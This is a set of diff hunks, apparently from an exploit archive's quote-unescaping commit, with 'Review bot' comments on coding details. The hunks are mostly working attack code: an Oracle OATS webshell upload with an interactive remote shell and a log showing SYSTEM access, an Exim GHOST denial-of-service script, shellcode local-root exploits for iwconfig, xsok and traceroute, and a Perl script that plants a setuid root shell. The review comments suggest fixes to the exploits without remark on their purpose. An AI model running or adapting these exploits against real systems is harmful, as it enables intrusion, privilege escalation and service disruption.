post_data = post_data + "Content-Disposition: form-data; name=\"fileType\"\r\n"
|
||||
post_data = post_data + "\r\n*\r\n"
|
||||
post_data = post_data + "--" + boundary + "\r\n"
|
||||
post_data = post_data + "Content-Disposition: form-data; name=\"file1\"; filename=\"webshell.jsp\"\r\n"
|
||||
post_data = post_data + "Content-Type: text/plain\r\n"
|
||||
post_data = post_data + "\r\n" + webshell_content +"\r\n"
|
||||
post_data = post_data + "--" + boundary + "\r\n"
|
||||
post_data = post_data + "Content-Disposition: form-data; name=\"storage.repository\"\r\n"
|
||||
post_data = post_data + "\r\nDefault\r\n"
|
||||
post_data = post_data + "--" + boundary + "\r\n"
|
||||
post_data = post_data + "Content-Disposition: form-data; name=\"storage.workspace\"\r\n"
|
||||
post_data = post_data + "\r\n.\r\n"
|
||||
post_data = post_data + "--" + boundary + "\r\n"
|
||||
post_data = post_data + "Content-Disposition: form-data; name=\"directory\"\r\n"
|
||||
post_data = post_data + "\r\n" + "../oats\servers\AdminServer\\tmp\_WL_user\oats_ee\\1ryhnd\war\pages" +"\r\n"
|
||||
post_data = post_data + "--" + boundary + "--"+"\r\n"
|
||||
|
||||
try:
|
||||
request.add_data(post_data)
|
||||
response = urllib2.urlopen(request)
|
||||
if response.code == 200 :
|
||||
print \"[+]upload done!\"
|
||||
webshellurl = \"http://\" + ip + \":\" + str(port) + \"/olt/pages/webshell.jsp\"
|
||||
print \"[+]wait a moment,detecting whether the webshell exists...\"
|
||||
print "[+]upload done!"
|
||||
webshellurl = "http://" + ip + ":" + str(port) + "/olt/pages/webshell.jsp"
|
||||
print "[+]wait a moment,detecting whether the webshell exists..."
|
||||
if urllib2.urlopen(webshellurl).code == 200 :
|
||||
print \"[+]upload webshell successfully!\"
|
||||
print \"[+]return a cmd shell\"
|
||||
print "[+]upload webshell successfully!"
|
||||
print "[+]return a cmd shell"
|
||||
while True:
|
||||
cmd = raw_input(\">>: \")
|
||||
if cmd == \"exit\" :
|
||||
cmd = raw_input(">>: ")
|
||||
if cmd == "exit" :
|
||||
break
|
||||
print urllib.urlopen(webshellurl+\"?{cmd}=\" + cmd).read().lstrip()
|
||||
print urllib.urlopen(webshellurl+"?{cmd}=" + cmd).read().lstrip()
|
||||
else:
|
||||
print \"[-]attack fail!\"
|
||||
print "[-]attack fail!"
|
||||
else:
|
||||
print \"[-]attack fail!\"
|
||||
print "[-]attack fail!"
|
||||
except Exception as e:
|
||||
print \"[-]attack fail!\"
|
||||
print "[-]attack fail!"
|
||||
|
||||
\'\'\'
|
||||
'''
|
||||
#run the exploit and get a cmd shell
|
||||
root@kali:~/Desktop# python exploit.py
|
||||
[+]upload done!
|
||||
|
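Review bot: the added line `"../oats\servers\AdminServer\\tmp\_WL_user\oats_ee\\1ryhnd\war\pages"` depends on Python leaving unrecognised escapes (`\s`, `\A`, `\_`, `\o`, `\w`, `\p`) untouched while `\t` and `\1` would not be, which is why only `\\tmp` and `\\1ryhnd` are doubled. A raw string (`r"..."`) would express the Windows path unambiguously and avoid mixed escaping that is easy to break again on the next import/export round trip; the removed line's quadrupled backslashes are exactly that kind of round-trip damage.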
@ -98,10 +98,10 @@ root@kali:~/Desktop# python exploit.py
|
|||
[+]upload webshell successfully!
|
||||
[+]return a cmd shell
|
||||
>>: whoami
|
||||
nt authority\\system
|
||||
nt authority\system
|
||||
|
||||
|
||||
>>: exit
|
||||
\'\'\'
|
||||
'''
|
||||
|
||||
|
||||
|
|
|
@ -13,7 +13,7 @@
|
|||
#
|
||||
# USAGE: python ghost-smtp-dos.py <ip> <port>
|
||||
#
|
||||
# Escape character is \'^]\'.
|
||||
# Escape character is '^]'.
|
||||
# 220 debian-7-7-64b ESMTP Exim 4.80 ...
|
||||
# HELO
|
||||
# 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
|
||||
|
@ -33,28 +33,28 @@ def main(argv):
|
|||
argc = len(argv)
|
||||
|
||||
if argc <= 1:
|
||||
print \"usage: %s <host>\" % (argv[0])
|
||||
print "usage: %s <host>" % (argv[0])
|
||||
sys.exit(0)
|
||||
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
buffer = \"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
|
||||
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\"
|
||||
buffer = "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
|
||||
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
|
||||
|
||||
target = argv[1] # SET TARGET
|
||||
port = argv[2] # SET PORT
|
||||
|
||||
print \"(--==== Exim ESMTP DoS Exploit by 1N3 - https://crowdshield.com\"
|
||||
print \"(--==== Sending GHOST SMTP DoS to \" + target + \":\" + port + \" with length:\" +str(len(buffer))
|
||||
print "(--==== Exim ESMTP DoS Exploit by 1N3 - https://crowdshield.com"
|
||||
print "(--==== Sending GHOST SMTP DoS to " + target + ":" + port + " with length:" +str(len(buffer))
|
||||
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
connect=s.connect((target,int(port)))
|
||||
data = s.recv(1024)
|
||||
print \"CONNECTION: \" +data
|
||||
s.send(\'HELO \' + buffer + \'\\r\\n\')
|
||||
print "CONNECTION: " +data
|
||||
s.send('HELO ' + buffer + '\r\n')
|
||||
data = s.recv(1024)
|
||||
print \"received: \" +data
|
||||
s.send(\'EHLO \' + buffer + \'\\r\\n\')
|
||||
print "received: " +data
|
||||
s.send('EHLO ' + buffer + '\r\n')
|
||||
data = s.recv(1024)
|
||||
print \"received: \" +data
|
||||
print "received: " +data
|
||||
s.close()
|
||||
|
||||
main(sys.argv)
|
||||
|
|
|
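Review bot: the new `buffer = "000...` literal continues onto a second physical line (`000...000"`) with no backslash continuation or triple quotes, and the hunk counts (`-33,28 +33,28`) confirm these are two lines in the stored file rather than a display wrap, so the file as committed is not valid Python (unterminated string literal). If the wrap was introduced when the exploit was imported into the database rather than by its author, the import path deserves a fix alongside the quote unescaping this commit performs; if it is in the author's original, a note in the file header would save the next reader the investigation.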
@ -7,12 +7,12 @@
|
|||
|
||||
/* 45 Byte /bin/sh >> http://www.milw0rm.com/id.php?id=1169 */
|
||||
char shellcode[]=
|
||||
\"\\x31\\xc0\\x31\\xdb\\x50\\x68\\x2f\\x2f\"
|
||||
\"\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\"
|
||||
\"\\xe3\\x50\\x53\\x89\\xe1\\x31\\xd2\\xb0\"
|
||||
\"\\x0b\\x51\\x52\\x55\\x89\\xe5\\x0f\\x34\"
|
||||
\"\\x31\\xc0\\x31\\xdb\\xfe\\xc0\\x51\\x52\"
|
||||
\"\\x55\\x89\\xe5\\x0f\\x34\";
|
||||
"\x31\xc0\x31\xdb\x50\x68\x2f\x2f"
|
||||
"\x73\x68\x68\x2f\x62\x69\x6e\x89"
|
||||
"\xe3\x50\x53\x89\xe1\x31\xd2\xb0"
|
||||
"\x0b\x51\x52\x55\x89\xe5\x0f\x34"
|
||||
"\x31\xc0\x31\xdb\xfe\xc0\x51\x52"
|
||||
"\x55\x89\xe5\x0f\x34";
|
||||
|
||||
int main(int argc,char **argv){
|
||||
char buf[96];
|
||||
|
@ -20,30 +20,30 @@ int main(int argc,char **argv){
|
|||
unsigned long ret;
|
||||
int i, offset;
|
||||
unsigned long sp(void)
|
||||
{ __asm__(\"movl %esp, %eax\");}
|
||||
{ __asm__("movl %esp, %eax");}
|
||||
char *prog[]={argv[1],buf,NULL};
|
||||
char *env[]={\"3v1lsh3ll0=\",shellcode,NULL};
|
||||
char *env[]={"3v1lsh3ll0=",shellcode,NULL};
|
||||
|
||||
if (argc >= 2) {
|
||||
printf(\"\\n*********************************************\\n\");
|
||||
printf(\" iwconfig Version 26 Localroot Exploit \\n\");
|
||||
printf(\" Coded by Qnix[at]bsdmail[dot]org \\n\");
|
||||
printf(\"*********************************************\\n\\n\");
|
||||
printf("\n*********************************************\n");
|
||||
printf(" iwconfig Version 26 Localroot Exploit \n");
|
||||
printf(" Coded by Qnix[at]bsdmail[dot]org \n");
|
||||
printf("*********************************************\n\n");
|
||||
} else {
|
||||
printf(\"\\n*********************************************\\n\");
|
||||
printf(\" iwconfig Version 26 Localroot Exploit \\n\");
|
||||
printf(\" Coded by Qnix[at]bsdmail[dot]org \\n\");
|
||||
printf(\"*********************************************\\n\\n\");
|
||||
printf(\"\\n USEAGE: ./iwconfig-exploit <iwconfig FULLPATH e.g /sbin/iwconfig or /usr/sbin/iwconfig>\\n\\n\");
|
||||
printf("\n*********************************************\n");
|
||||
printf(" iwconfig Version 26 Localroot Exploit \n");
|
||||
printf(" Coded by Qnix[at]bsdmail[dot]org \n");
|
||||
printf("*********************************************\n\n");
|
||||
printf("\n USEAGE: ./iwconfig-exploit <iwconfig FULLPATH e.g /sbin/iwconfig or /usr/sbin/iwconfig>\n\n");
|
||||
return 1;
|
||||
}
|
||||
|
||||
offset = 0;
|
||||
esp = sp();
|
||||
ret=0xc0000000-strlen(shellcode)-strlen(prog[0])-0x06;
|
||||
printf(\"[~] S-p.ESP : 0x%x\\n\", esp);
|
||||
printf(\"[~] O-F.ESP : 0x%x\\n\", offset);
|
||||
printf(\"[~] Return Addr : 0x%x\\n\\n\", ret);
|
||||
printf("[~] S-p.ESP : 0x%x\n", esp);
|
||||
printf("[~] O-F.ESP : 0x%x\n", offset);
|
||||
printf("[~] Return Addr : 0x%x\n\n", ret);
|
||||
|
||||
memset(buf,0x41,sizeof(buf));
|
||||
memcpy(&buf[92],&ret,4);
|
||||
|
|
|
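Review bot: `unsigned long sp(void) { __asm__("movl %esp, %eax");}` is a nested function (a GCC extension) with no return statement, so it relies on `%eax` happening to hold the result when the function returns, which is undefined behaviour in standard C; an extended-asm form with an output operand, `__asm__("movl %%esp, %0" : "=r"(esp));`, expresses the same read portably. The `USEAGE` typo in the usage `printf` line persists across the change. The unescaping of `\"movl %esp, %eax\"` restores a compilable string literal.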
@ -11,7 +11,7 @@
|
|||
#include <stdio.h>
|
||||
#include <unistd.h>
|
||||
|
||||
#define BIN \"/usr/games/xsok\"
|
||||
#define BIN "/usr/games/xsok"
|
||||
#define RETADD 0xbffffa3c
|
||||
#define SIZE 200
|
||||
|
||||
|
@ -19,12 +19,12 @@
|
|||
unsigned char shellcode[] =
|
||||
|
||||
/* setregid (20,20) shellcode */
|
||||
\"\\x31\\xc0\\x31\\xdb\\x31\\xc9\\xb3\\x14\\xb1\\x14\\xb0\\x47\"
|
||||
\"\\xcd\\x80\"
|
||||
"\x31\xc0\x31\xdb\x31\xc9\xb3\x14\xb1\x14\xb0\x47"
|
||||
"\xcd\x80"
|
||||
|
||||
/* exec /bin/sh shellcode */
|
||||
\"\\x31\\xd2\\x52\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\\x2f\\x62\"
|
||||
\"\\x69\\x89\\xe3\\x52\\x53\\x89\\xe1\\x8d\\x42\\x0b\\xcd\\x80\";
|
||||
"\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62"
|
||||
"\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80";
|
||||
|
||||
|
||||
|
||||
|
@ -33,8 +33,8 @@ int main (int argc, char ** argv)
|
|||
int i, ret = RETADD;
|
||||
char out[SIZE];
|
||||
|
||||
fprintf(stdout, \"\\n --- 0x333xsok => xsok 1.02 local games exploit ---\\n\");
|
||||
fprintf(stdout, \" --- Outsiders Se(c)urity Labs 2003 ---\\n\\n\");
|
||||
fprintf(stdout, "\n --- 0x333xsok => xsok 1.02 local games exploit ---\n");
|
||||
fprintf(stdout, " --- Outsiders Se(c)urity Labs 2003 ---\n\n");
|
||||
|
||||
int *xsok = (int *)(out);
|
||||
|
||||
|
@ -43,7 +43,7 @@ int main (int argc, char ** argv)
|
|||
memset((char *)out, 0x90, 63);
|
||||
memcpy((char *)out+63, shellcode, strlen(shellcode));
|
||||
|
||||
execl (BIN, BIN, \"-xsokdir\", out, 0x0);
|
||||
execl (BIN, BIN, "-xsokdir", out, 0x0);
|
||||
}
|
||||
|
||||
// milw0rm.com [2004-01-02]
|
||||
|
|
|
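Review bot: `execl (BIN, BIN, "-xsokdir", out, 0x0);` terminates the variadic argument list with the integer constant `0x0`, which is not guaranteed to be promoted to a null pointer of pointer width in a variadic call; `(char *)NULL` is the correct sentinel. On the preceding `memcpy((char *)out+63, shellcode, strlen(shellcode))` line, `shellcode` is `unsigned char[]`, so `strlen` gets a pointer of the wrong signedness and should be cast explicitly. The string unescaping itself is right.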
@ -2,7 +2,7 @@
|
|||
* MasterSecuritY <www.mastersecurity.fr>
|
||||
*
|
||||
* openwall.c - Local root exploit in LBNL traceroute
|
||||
* Copyright (C) 2000 Michel \"MaXX\" Kaempf <maxx@mastersecurity.fr>
|
||||
* Copyright (C) 2000 Michel "MaXX" Kaempf <maxx@mastersecurity.fr>
|
||||
*
|
||||
* Updated versions of this exploit and the corresponding advisory will
|
||||
* be made available at:
|
||||
|
@ -32,32 +32,32 @@
|
|||
#define PREV_INUSE 0x1
|
||||
#define IS_MMAPPED 0x2
|
||||
|
||||
char * filename = \"/usr/sbin/traceroute\";
|
||||
char * filename = "/usr/sbin/traceroute";
|
||||
unsigned int stack = 0xc0000000 - 4;
|
||||
unsigned int p = 0x0804ce38;
|
||||
unsigned int victim = 0x0804c88c;
|
||||
|
||||
char * jmp = \"\\xeb\\x0aXXYYYYZZZZ\";
|
||||
char * jmp = "\xeb\x0aXXYYYYZZZZ";
|
||||
|
||||
char * shellcode =
|
||||
/* <shellcode>: xor %edx,%edx */
|
||||
\"\\x31\\xd2\"
|
||||
"\x31\xd2"
|
||||
/* <shellcode+2>: mov %edx,%eax */
|
||||
\"\\x89\\xd0\"
|
||||
"\x89\xd0"
|
||||
/* <shellcode+4>: mov $0xb,%al */
|
||||
\"\\xb0\\x0b\"
|
||||
"\xb0\x0b"
|
||||
/* <shellcode+6>: mov $XXXX,%ebx */
|
||||
\"\\xbbXXXX\"
|
||||
"\xbbXXXX"
|
||||
/* <shellcode+11>: mov $XXXX,%ecx */
|
||||
\"\\xb9XXXX\"
|
||||
"\xb9XXXX"
|
||||
/* <shellcode+16>: mov %ebx,(%ecx) */
|
||||
\"\\x89\\x19\"
|
||||
"\x89\x19"
|
||||
/* <shellcode+18>: mov %edx,0x4(%ecx) */
|
||||
\"\\x89\\x51\\x04\"
|
||||
"\x89\x51\x04"
|
||||
/* <shellcode+21>: int $0x80 */
|
||||
\"\\xcd\\x80\";
|
||||
"\xcd\x80";
|
||||
|
||||
char * program = \"/bin/sh\";
|
||||
char * program = "/bin/sh";
|
||||
|
||||
int zero( unsigned int ui )
|
||||
{
|
||||
|
@ -71,29 +71,29 @@ int main()
|
|||
{
|
||||
char gateway[ 1337 ];
|
||||
char host[ 1337 ];
|
||||
char * argv[] = { filename, \"-g\", \"123\", \"-g\", gateway, host, NULL };
|
||||
char * argv[] = { filename, "-g", "123", "-g", gateway, host, NULL };
|
||||
unsigned int next;
|
||||
int i;
|
||||
unsigned int hellcode;
|
||||
unsigned int size;
|
||||
|
||||
strcpy( host, \"AAAABBBBCCCCDDDDEEEE\" );
|
||||
next = stack - (strlen(filename) + 1) - (strlen(host) + 1) + strlen(\"AAAA\");
|
||||
strcpy( host, "AAAABBBBCCCCDDDDEEEE" );
|
||||
next = stack - (strlen(filename) + 1) - (strlen(host) + 1) + strlen("AAAA");
|
||||
for ( i = 0; i < next - (next & ~3); i++ ) {
|
||||
strcat( host, \"X\" );
|
||||
strcat( host, "X" );
|
||||
}
|
||||
next = next & ~3;
|
||||
|
||||
((unsigned int *)host)[1] = 0xffffffff & ~PREV_INUSE;
|
||||
((unsigned int *)host)[2] = 0xffffffff;
|
||||
if ( zero( victim - 12 ) ) {
|
||||
fprintf( stderr, \"Null byte(s) in `victim - 12\' (0x%08x)!\\n\", victim - 12 );
|
||||
fprintf( stderr, "Null byte(s) in `victim - 12' (0x%08x)!\n", victim - 12 );
|
||||
return( -1 );
|
||||
}
|
||||
((unsigned int *)host)[3] = victim - 12;
|
||||
hellcode = p + (strlen(\"123\") + 1) + strlen(\"0x42.0x42.0x42.0x42\") + strlen(\" \");
|
||||
hellcode = p + (strlen("123") + 1) + strlen("0x42.0x42.0x42.0x42") + strlen(" ");
|
||||
if ( zero( hellcode ) ) {
|
||||
fprintf( stderr, \"Null byte(s) in `host\' (0x%08x)!\\n\", hellcode );
|
||||
fprintf( stderr, "Null byte(s) in `host' (0x%08x)!\n", hellcode );
|
||||
return( -1 );
|
||||
}
|
||||
((unsigned int *)host)[4] = hellcode;
|
||||
|
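Review bot: the single-quote case is handled correctly here: ``\"Null byte(s) in `victim - 12\' (0x%08x)!\\n\"`` becomes ``"Null byte(s) in `victim - 12' (0x%08x)!\n"``, i.e. `\'` collapses to a bare `'`, which is what a C double-quoted string needs (an escaped `\'` would also compile, but the bare form is what the author wrote). The pointer-cast writes such as `((unsigned int *)host)[3] = victim - 12;` pass through untouched, so the hunk is escape-only as intended.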
@ -102,31 +102,31 @@ int main()
|
|||
size = size | PREV_INUSE;
|
||||
sprintf(
|
||||
gateway,
|
||||
\"0x%02x.0x%02x.0x%02x.0x%02x\",
|
||||
"0x%02x.0x%02x.0x%02x.0x%02x",
|
||||
((unsigned char *)(&size))[0],
|
||||
((unsigned char *)(&size))[1],
|
||||
((unsigned char *)(&size))[2],
|
||||
((unsigned char *)(&size))[3]
|
||||
);
|
||||
|
||||
strcat( gateway, \" \" );
|
||||
strcat( gateway, " " );
|
||||
strcat( gateway, jmp );
|
||||
strcat( gateway, shellcode );
|
||||
strcat( gateway, program );
|
||||
|
||||
hellcode += strlen(jmp) + strlen(shellcode);
|
||||
if ( zero( hellcode ) ) {
|
||||
fprintf( stderr, \"Null byte(s) in `gateway\' (0x%08x)!\\n\", hellcode );
|
||||
fprintf( stderr, "Null byte(s) in `gateway' (0x%08x)!\n", hellcode );
|
||||
return( -1 );
|
||||
}
|
||||
*((unsigned int *)(gateway + strlen(\"0x42.0x42.0x42.0x42\") + strlen(\" \") + strlen(jmp) + 7)) = hellcode;
|
||||
*((unsigned int *)(gateway + strlen("0x42.0x42.0x42.0x42") + strlen(" ") + strlen(jmp) + 7)) = hellcode;
|
||||
|
||||
hellcode += strlen(program) + 1;
|
||||
if ( zero( hellcode ) ) {
|
||||
fprintf( stderr, \"Null byte(s) in `gateway\' (0x%08x)!\\n\", hellcode );
|
||||
fprintf( stderr, "Null byte(s) in `gateway' (0x%08x)!\n", hellcode );
|
||||
return( -1 );
|
||||
}
|
||||
*((unsigned int *)(gateway + strlen(\"0x42.0x42.0x42.0x42\") + strlen(\" \") + strlen(jmp) + 12)) = hellcode;
|
||||
*((unsigned int *)(gateway + strlen("0x42.0x42.0x42.0x42") + strlen(" ") + strlen(jmp) + 12)) = hellcode;
|
||||
|
||||
execve( argv[0], argv, NULL );
|
||||
return( -1 );
|
||||
|
|
|
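Review bot: this hunk contains a two-level case and the result keeps exactly one level, which is right: `printf TEMP \" setuid(0);\\n\\tsetgid(0);\\n\\texecl(\\\"/bin/sh\\\",\\\"sh\\\",0);...` becomes `printf TEMP " setuid(0);\n\tsetgid(0);\n\texecl(\"/bin/sh\",\"sh\",0);...`, where the remaining `\"` is the Perl escaping for quotes that must appear in the generated C source. By contrast `\\/` in the `system "export $EXPORT1 ;export $EXPORT2 ; $DUMPER -0 \\/"` lines only drops to `\/`, and in a Perl double-quoted string `\/` is just `/`, so that backslash was never needed either; harmless, but the commit message should say whether the goal was "remove one layer" or "restore what the author wrote", because the two policies differ on exactly this kind of line.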
@ -5,134 +5,134 @@
|
|||
# written by tlabs
|
||||
# Use at your discretion
|
||||
|
||||
$EXPORT1=\"TAPE=garbage:garbage\" ;
|
||||
$EXPORT2=\"RSH=./hey\" ;
|
||||
$EXPORT1="TAPE=garbage:garbage" ;
|
||||
$EXPORT2="RSH=./hey" ;
|
||||
|
||||
sub USAGE
|
||||
{
|
||||
print \"$0 <type>\\n1=dump 2=dump.static 3=restore 4=restore.staic\\nYour choice innit;)\\nWritten by Tlabs\\n\" ;
|
||||
print "$0 <type>\n1=dump 2=dump.static 3=restore 4=restore.staic\nYour choice innit;)\nWritten by Tlabs\n" ;
|
||||
exit 0 ;
|
||||
}
|
||||
|
||||
sub ERROR
|
||||
{
|
||||
print \"$_[0]\\n\" ;
|
||||
print "$_[0]\n" ;
|
||||
exit 0 ;
|
||||
}
|
||||
|
||||
open(TEMP, \">shell.c\")|| ERROR(\"Something went wrong:$!\");
|
||||
printf TEMP \"#include<unistd.h>\\n#include<stdlib.h>\\nint main()\\n{\" ;
|
||||
printf TEMP \" setuid(0);\\n\\tsetgid(0);\\n\\texecl(\\\"/bin/sh\\\",\\\"sh\\\",0);\\n\\treturn 0;\\n}\" ;
|
||||
open(TEMP, ">shell.c")|| ERROR("Something went wrong:$!");
|
||||
printf TEMP "#include<unistd.h>\n#include<stdlib.h>\nint main()\n{" ;
|
||||
printf TEMP " setuid(0);\n\tsetgid(0);\n\texecl(\"/bin/sh\",\"sh\",0);\n\treturn 0;\n}" ;
|
||||
close(TEMP);
|
||||
system \"cc -o shell shell.c\" ;
|
||||
unlink \"shell.c\" ;
|
||||
open(TEMP1, \">hey\")|| ERROR(\"Something went wrong: $!\");
|
||||
printf TEMP1 \"#!/bin/sh\\nchown root shell\\nchmod 4755 shell\" ;
|
||||
system "cc -o shell shell.c" ;
|
||||
unlink "shell.c" ;
|
||||
open(TEMP1, ">hey")|| ERROR("Something went wrong: $!");
|
||||
printf TEMP1 "#!/bin/sh\nchown root shell\nchmod 4755 shell" ;
|
||||
close(TEMP1);
|
||||
chmod(0755, \"hey\");
|
||||
chmod(0755, "hey");
|
||||
|
||||
if ($ARGV[$0] eq \"1\")
|
||||
if ($ARGV[$0] eq "1")
|
||||
{
|
||||
$DUMPER=\"/sbin/dump\" ;
|
||||
if ( -u \"$DUMPER\" )
|
||||
$DUMPER="/sbin/dump" ;
|
||||
if ( -u "$DUMPER" )
|
||||
{
|
||||
system \"export $EXPORT1 ;export $EXPORT2 ; $DUMPER -0 \\/\" ;
|
||||
system "export $EXPORT1 ;export $EXPORT2 ; $DUMPER -0 \/" ;
|
||||
sleep(3);
|
||||
if ( -u \"shell\" )
|
||||
if ( -u "shell" )
|
||||
{
|
||||
unlink \"hey\" ;
|
||||
system \"./shell\" ;
|
||||
unlink "hey" ;
|
||||
system "./shell" ;
|
||||
}
|
||||
else
|
||||
{
|
||||
unlink \"hey\" ;
|
||||
unlink \"shell\" ;
|
||||
print \"Something fucked at the last, sorry\" ;
|
||||
unlink "hey" ;
|
||||
unlink "shell" ;
|
||||
print "Something fucked at the last, sorry" ;
|
||||
}
|
||||
}
|
||||
else
|
||||
{
|
||||
unlink \"hey\" ;
|
||||
unlink \"shell\" ;
|
||||
printf \"Dump is not exploitable on this system\\n\";
|
||||
unlink "hey" ;
|
||||
unlink "shell" ;
|
||||
printf "Dump is not exploitable on this system\n";
|
||||
}
|
||||
}
|
||||
elsif ($ARGV[$0] eq \"2\")
|
||||
elsif ($ARGV[$0] eq "2")
|
||||
{
|
||||
$DUMPER=\"/sbin/dump.static\" ;
|
||||
if ( -u \"$DUMPER\" )
|
||||
$DUMPER="/sbin/dump.static" ;
|
||||
if ( -u "$DUMPER" )
|
||||
{
|
||||
system \"export $EXPORT1 ;export $EXPORT2 ; $DUMPER -0 \\/\" ;
|
||||
system "export $EXPORT1 ;export $EXPORT2 ; $DUMPER -0 \/" ;
|
||||
sleep(3);
|
||||
if ( -u \"shell\" )
|
||||
if ( -u "shell" )
|
||||
{
|
||||
unlink \"hey\" ;
|
||||
system \"./shell\" ;
|
||||
unlink "hey" ;
|
||||
system "./shell" ;
|
||||
}
|
||||
else
|
||||
{
|
||||
unlink \"hey\" ;
|
||||
unlink \"shell\" ;
|
||||
print \"Something fucked at the last, sorry\" ;
|
||||
unlink "hey" ;
|
||||
unlink "shell" ;
|
||||
print "Something fucked at the last, sorry" ;
|
||||
}
|
||||
}
|
||||
else
|
||||
{
|
||||
unlink \"hey\" ;
|
||||
unlink \"shell\" ;
|
||||
printf \"Dump.static is not exploitable on this system\\n\";
|
||||
unlink "hey" ;
|
||||
unlink "shell" ;
|
||||
printf "Dump.static is not exploitable on this system\n";
|
||||
}
|
||||
}
|
||||
elsif ($ARGV[$0] eq \"3\")
|
||||
elsif ($ARGV[$0] eq "3")
|
||||
{
|
||||
$RESTORER=\"/sbin/restore\" ;
|
||||
if ( -u \"$RESTORER\" )
|
||||
$RESTORER="/sbin/restore" ;
|
||||
if ( -u "$RESTORER" )
|
||||
{
|
||||
system \"export $EXPORT1 ; export $EXPORT2 ; $RESTORER -i\" ;
|
||||
system "export $EXPORT1 ; export $EXPORT2 ; $RESTORER -i" ;
|
||||
sleep(3);
|
||||
if ( -u \"shell\" )
|
||||
if ( -u "shell" )
|
||||
{
|
||||
unlink \"hey\" ;
|
||||
system \"./shell\" ;
|
||||
unlink "hey" ;
|
||||
system "./shell" ;
|
||||
}
|
||||
else
|
||||
{
|
||||
unlink \"hey\" ;
|
||||
unlink \"shell\" ;
|
||||
print \"Something fucked at the last, sorry\" ;
|
||||
unlink "hey" ;
|
||||
unlink "shell" ;
|
||||
print "Something fucked at the last, sorry" ;
|
||||
}
|
||||
}
|
||||
else
|
||||
{
|
||||
unlink \"hey\" ;
|
||||
unlink \"shell\" ;
|
||||
printf \"Restore is not exploitable on this system\\n\";
|
||||
unlink "hey" ;
|
||||
unlink "shell" ;
|
||||
printf "Restore is not exploitable on this system\n";
|
||||
}
|
||||
}
|
||||
elsif ($ARGV[$0] eq \"4\")
|
||||
elsif ($ARGV[$0] eq "4")
|
||||
{
|
||||
$RESTORER=\"/sbin/restore.static\" ;
|
||||
if ( -u \"$RESTORER\" )
|
||||
$RESTORER="/sbin/restore.static" ;
|
||||
if ( -u "$RESTORER" )
|
||||
{
|
||||
system \"export $EXPORT1 ; export $EXPORT2 ; $RESTORER -i\" ;
|
||||
system "export $EXPORT1 ; export $EXPORT2 ; $RESTORER -i" ;
|
||||
sleep(3);
|
||||
if ( -u \"shell\" )
|
||||
if ( -u "shell" )
|
||||
{
|
||||
unlink \"hey\" ;
|
||||
system \"./shell\" ;
|
||||
unlink "hey" ;
|
||||
system "./shell" ;
|
||||
}
|
||||
else
|
||||
{
|
||||
unlink \"hey\" ;
|
||||
unlink \"shell\" ;
|
||||
print \"Something fucked at the last, sorry\" ;
|
||||
unlink "hey" ;
|
||||
unlink "shell" ;
|
||||
print "Something fucked at the last, sorry" ;
|
||||
}
|
||||
}
|
||||
else
|
||||
{
|
||||
unlink \"hey\" ;
|
||||
unlink \"shell\" ;
|
||||
printf \"Restore.static is not exploitable on this system\\n\";
|
||||
unlink "hey" ;
|
||||
unlink "shell" ;
|
||||
printf "Restore.static is not exploitable on this system\n";
|
||||
}
|
||||
}
|
||||
else
|
||||
|
|
|
@ -43,16 +43,16 @@ It should be noted under Linux this problem must be exploited in conjunction wit
|
|||
#define DEFAULT_BUFFER_SIZE 2048
|
||||
#define DEFAULT_EGG_SIZE 1024
|
||||
#define NOP 0x90
|
||||
#define PATH \\\"/tmp/LC_MESSAGES\\\"
|
||||
#define PATH "/tmp/LC_MESSAGES"
|
||||
|
||||
char shellcode[] =
|
||||
\\\"\\\\xeb\\\\x1f\\\\x5e\\\\x89\\\\x76\\\\x08\\\\x31\\\\xc0\\\\x88\\\\x46\\\\x07\\\\x89\\\\x46\\\\x0c\\\\xb0\\\\x0b\\\"
|
||||
\\\"\\\\x89\\\\xf3\\\\x8d\\\\x4e\\\\x08\\\\x8d\\\\x56\\\\x0c\\\\xcd\\\\x80\\\\x31\\\\xdb\\\\x89\\\\xd8\\\\x40\\\\xcd\\\"
|
